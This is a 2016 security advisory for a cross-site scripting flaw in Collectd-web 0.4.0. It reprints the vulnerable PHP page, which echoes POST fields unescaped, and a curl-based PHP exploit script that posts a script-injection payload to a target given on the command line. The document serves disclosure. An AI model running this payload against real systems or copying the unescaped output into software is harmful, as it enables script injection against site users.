Collectd-Web 0.4.0 Cross Site Scripting

`Title -Collectd-web XSS  
  
# Exploit Title : XSS Vulnerabilitie in Collectd-web  
# Date: Sun May 22 11:55:36 EDT 2016  
# Reported Date : Sun May 22 11:55:36 EDT 2016  
# Vendor Homepage: https://collectd.org/wiki/index.php/Collectd-web  
# Version: Version: 0.4.0  
# Software Link: https://github.com/httpdss/collectd-web  
# solution :https://github.com/httpdss/collectd-web/issues/77  
# Exploit Author :MehrdadLinux  
# Tested On : Linux Platforms.  
# Facebook : https://facebook.com/MehrdadLinux  
# Twitter : http://twitter.com/MehrdadLinux  
# Detailed Vul: http://blog.opsnit.com  
===========================================================================================  
  
1. VULNERABILITY  
-------------------------  
  
XSS Vulnerabilitie in Collectd-web 0.4.0 – January2016  
  
  
2. BACKGROUND  
-------------------------  
Collectd-web is a web-based front-end for RRD data collected by collectd.  
It is based on contrib/collection.cgi, a demo CGI script included in  
collectd.  
With strong emphasis on the usage of Jquery and JqueryUI, Collectd-Web  
manages to give sysadmins a nice yet functional interface.  
  
  
3. DESCRIPTION  
-------------------------  
XSS in ajax_post.php  
https://github.com/httpdss/collectd-web/blob/master/media/jqtouch/demos/main/ajax_post.php  
  
1 <?php  
2 $theaters = array("Los Gatos Cinema","Cinelux Plaza Theatre","Camera  
7");  
3 $movies = array("Transformers","Knocked Up","Live Free Die Hard");  
4 $title = "-";  
5 if ($_POST["zip"]) {  
6 $title = "Zip " . $_POST['zip'];  
7 } else {  
8 $title = $_POST['movie'];  
9 }  
10 ?>  
11 <div>  
12 <div class="toolbar">  
13 <h1><?php echo $title ?></h1>  
14 <a href="#" class="button back">Back</a>  
15 </div>  
16 <ul class="edgetoedge">  
17 <?php  
18 if ($_POST['zip']) {  
19 foreach ($theaters as $theater) {  
20 echo '<li><a href="#theater">' . $theater . '</a></li>';  
21 }  
22 } else {  
23 foreach ($movies as $movie) {  
24 echo '<li><a href="#movie">' . $movie . '</a></li>';  
25 }  
26 }  
27 ?>  
28 </ul>  
29 <form action="ajax_post.php" method="POST">  
30 <ul class="rounded">  
31 <li><input type="text" name="zip" value="" placeholder="Live  
post event test" /></li>  
32 </ul>  
33 <a style="margin:0 10px;color:rgba(0,0,0,.9)" href="#"  
class="submit whiteButton">Submit</a>  
34  
35 </form>  
36 </div>  
  
in line 5 have VULNERABILITY in zip POST method  
  
  
====================================Exploit=========================================  
<?php  
$yourtarget = $argv[1];  
$ch = curl_init();  
curl_setopt($ch, CURLOPT_URL, "http://  
$yourtarget/collectd-web/media/jqtouch/demos/main/ajax_post.php");  
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01;  
Windows NT 5.0)");  
curl_setopt($ch, CURLOPT_POST, 1);  
curl_setopt($ch, CURLOPT_POSTFIELDS,  
"movie=></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(77,101,104,114,100,97,100,76,105,110,117,120,32,88,83,83))</SCRIPT>");  
$buf = curl_exec ($ch);  
curl_close($ch);  
unset($ch);  
echo $buf;  
?>  
  
====================================Exploit=========================================  
  
4. discovered by :  
-------------------------  
  
The vulnerability has been discovered by Mehrdad Abbasi(MehrdadLinux) and  
Hossein Masoudi (cs.masoudi)  
email : MehrdadLinux (at) gmail (dot) com  
http://opsnit.com  
  
  
5 .LEGAL NOTICES  
-------------------------  
  
The information contained within this advisory is supplied "as-is" with  
no warranties or guarantees of fitness of use or otherwise. I accept no  
responsibility for any damage caused by the use or misuse of this  
information.  
`